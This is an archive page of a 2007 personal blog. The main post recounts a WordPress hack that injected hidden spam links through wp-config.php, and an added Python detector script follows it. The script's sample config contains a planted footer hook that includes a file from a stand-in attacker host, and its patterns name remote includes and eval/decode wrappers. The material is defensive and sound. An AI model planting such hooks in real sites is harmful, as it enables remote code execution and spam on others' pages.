Monthly Archive for August, 2007

Well That Was Embarrassing

It appears my blog was hacked along about July 29th, but I just now noticed.

The attacker managed to edit my wp-config.php file and attach WP-specific code that would include their remote file in the footer of each page load. I honestly probably never would have noticed, had I not checked my config file to see if the default WordPress cache were enabled or not.

Not only do I not load my own blog page frequently enough, but I don’t examine it closely enough either. The included code added a vast number of mortgage and debt consolidation spam links to the footer, all wrapped nicely in a hidden <div>. Since the code was valid and the destination server wasn’t slow enough to drag down the page, I shudder to think how long I could have been unknowingly contributing to these spammers had I not randomly checked a file that’s generally set and forgotten.

If you’d like to check out the specific code that was appended to my wp-config.php file, I’ve dumped it on Pasteosaurus for future reference. In addition, the code inserted at the end of every page is here. As you can see, not only were they spamming for mortgages and debt consolidation, but they were referencing legitimate URLs for universities (Auburn and Vanderbilt). Why anyone would want to discredit an EDU in search results, I have no clue…
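Two checks would have surfaced this a lot sooner: a baseline hash of wp-config.php plus a scan of it for code that has no business in a config file (WordPress hooks, remote includes, obfuscation wrappers), and a scan of the rendered page for links sitting inside a display:none container. Here is an added example of both in Python. It is not code from the original post, and the sample config and HTML below are constructed to mimic the pattern described above, not the actual code dumped on Pasteosaurus; the hostnames are placeholders.

```python
"""Added example: detect a tampered wp-config.php and hidden spam links.

Not the blog's own code. SAMPLE_CONFIG and SAMPLE_HTML are constructed
stand-ins for the attacker's payload; the domains are placeholders.
"""
import hashlib
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Things a legitimate wp-config.php never contains: WordPress action hooks
# (config is not plugin code), includes of remote URLs, and eval/decode wrappers.
SUSPICIOUS_CONFIG_PATTERNS = [
    r"add_action\s*\(\s*['\"]wp_footer['\"]",
    r"\b(?:include|require)(?:_once)?\s*\(?\s*['\"](?:https?|ftp)://",
    r"\b(?:eval|base64_decode|gzinflate|str_rot13)\s*\(",
]


def scan_wp_config(source):
    """Return each line of a wp-config.php that matches a suspicious pattern."""
    hits = []
    for line in source.splitlines():
        if any(re.search(p, line, re.I) for p in SUSPICIOUS_CONFIG_PATTERNS):
            hits.append(line.strip())
    return hits


def config_fingerprint(source):
    """SHA-256 of the file. Record it after a clean install or upgrade and
    compare on a schedule; a silent edit shows up as a changed digest."""
    return hashlib.sha256(source.encode()).hexdigest()


VOID_TAGS = {"br", "img", "input", "hr", "meta", "link"}


class HiddenLinkFinder(HTMLParser):
    """Collect hrefs that appear inside an element styled display:none
    or visibility:hidden (the hidden <div> trick from the post)."""

    def __init__(self):
        super().__init__()
        self.hidden_depth = 0
        self._stack = []  # one entry per open non-void tag: did it hide content?
        self.links = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        style = (attrs.get("style") or "").replace(" ", "").lower()
        hidden = "display:none" in style or "visibility:hidden" in style
        if tag not in VOID_TAGS:
            if hidden:
                self.hidden_depth += 1
            self._stack.append(hidden)
        if tag == "a" and self.hidden_depth and attrs.get("href"):
            self.links.append(attrs["href"])

    def handle_startendtag(self, tag, attrs):
        pass  # a self-closing element cannot contain links

    def handle_endtag(self, tag):
        if self._stack and self._stack.pop():
            self.hidden_depth -= 1


def find_hidden_links(html, site_host):
    """Return hrefs hidden from view that point off-site (your own hidden
    nav is not the problem; someone else's mortgage links are)."""
    finder = HiddenLinkFinder()
    finder.feed(html)
    return [h for h in finder.links if urlparse(h).hostname not in (None, site_host)]


# Constructed sample: a normal config with an attacker-style footer hook appended.
SAMPLE_CONFIG = """<?php
define('DB_NAME', 'wordpress');
define('WP_CACHE', true);
/* That's all, stop editing! */
require_once(ABSPATH . 'wp-settings.php');
add_action('wp_footer', 'load_extra'); // constructed: planted footer hook
function load_extra() { include('http://attacker.invalid/footer.txt'); } // constructed
"""

# Constructed sample: what the rendered footer looked like, roughly.
SAMPLE_HTML = """<html><body><h1>Post</h1>
<a href="http://example.invalid/about">about</a>
<div style="display: none"><a href="http://mortgage.example/refi">refinance</a>
<a href="http://debt.example/consolidate">debt</a>
<a href="http://example.invalid/tag/local">local</a></div>
</body></html>"""

if __name__ == "__main__":
    print("baseline:", config_fingerprint(SAMPLE_CONFIG))
    print("config hits:", scan_wp_config(SAMPLE_CONFIG))
    print("hidden off-site links:", find_hidden_links(SAMPLE_HTML, "example.invalid"))
```

Run the config scan from cron against the live wp-config.php and diff the fingerprint against the one you stored after the last upgrade; the page scan can run against `curl` output of your own front page so you do not have to remember to load the blog yourself.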

As for me, I’ll be keeping a better eye on my blog updates. I’ve switched to SVN so that it’s even easier than before, just to make sure there are no possible excuses next time a security release is made. I’ve also migrated this blog back to my Media Temple (gs) account temporarily, until I can finally fix some fallout from a botched Fedora Core 4 upgrade on my dedicated box[1]. If everything seems to be dragging, blame (mt)…

Finally, I’ve re-evaluated some of the plugins I’d been using. A lot of them I’d simply kept around for backwards compatibility, not wanting to break previous entries. This was a bad idea, since I was no longer paying attention to possible XSS vulnerabilities or stability patches for these plugins, leaving another potential opening for abuse on my blog. From now on, it’s the straight and narrow for me!

Not exactly how I wanted to spend my evening, but it could have been a lot worse… With unrestricted access to my blog and all its data, this is really the best possible outcome[2].

  1. I really wish Plesk would supply a yum repo… [back]
  2. Yes, I do run regular backups of the database, so data loss would have been at a very minimum. It still would have been very painful. [back]

OS Upgrades Coming down the Tubes

Just a little warning that tomorrow my blog will likely be intermittently unavailable while I’m performing a couple of OS upgrades which will require at least two reboots (that I know of).

I hate rebooting a live server; it always saddens me to see a quality uptime disappear just like that.

22:32:39 up 97 days, 14 min, 3 users, load average: 0.03, 0.06, 0.01

No, There’s Nothing New to See Yet!

So much of what we call management consists in making it difficult for people to work.
- Peter Drucker

Boy, isn’t it the truth? My boss is “managing” me right into a hole of utter unproductivity right now.

He apparently doesn’t understand that only 10% of the project is actually the layout of the interface (i.e., stuff he can “see”). The other 90% is where you’re working in the background making sure that pretty interface actually does something.

Two to three times a day, he’ll come by, call me, or email me asking if there’s anything new for him to see[1].

No, there’s nothing new for you to see, I’ll tell you when I’m done with something so you can see it. The more time we spend talking about how there’s nothing for you to see, the less time I get to spend actually working on something for you to see.

Add to that the bitter feeling it reinforces that I’m not getting anything done nearly fast enough, even though I’m working my ass off, and you’ve got one thoroughly unhappy developer.

Time to call those two job recruiters back, methinks…

  1. He’s supposedly on vacation this week, but at 8:24 this morning he still found the time to email me asking if there’s anything else he can see. [back]